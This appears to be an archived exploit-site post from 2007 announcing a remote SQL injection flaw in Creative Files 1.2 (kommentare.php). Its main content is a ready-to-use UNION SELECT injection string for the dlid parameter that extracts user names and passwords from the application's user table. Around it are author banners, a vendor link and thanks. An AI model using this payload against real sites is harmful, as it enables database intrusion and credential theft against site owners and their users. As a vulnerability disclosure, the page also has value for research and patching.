Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerability
# Published : 2007-03-16
# Author : xoron
# Previous Title : Php-Stats <= 0.1.9.1b (ip) Remote SQL Injection Exploit
# Next Title : Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit

======================X=O=R=O=N=====================
+
+ Creative Files 1.2 (kommentare.php)  Remote SQL Injection Vulnerabilities
+
======================X=O=R=O=N=====================
+
+ Bulan: xoron
+
+ xoron.biz
+
======================X=O=R=O=N=====================
+
+ SQL INJ:
+
+ kommentare.php?dlid=-1/**/UNION/**/SELECT/**/null,null,null,name,null,PASSWORD,null/**/FROM/**/user/*
+
======================X=O=R=O=N=====================
+
+ Vendor site: http://www.thecreativeheads.de/CreativeFiles/downloads.php
+
======================X=O=R=O=N=====================
+
+ Thnx: pang0, unique
+
======================X=O=R=O=N=====================

# www.Syue.com [2007-03-16]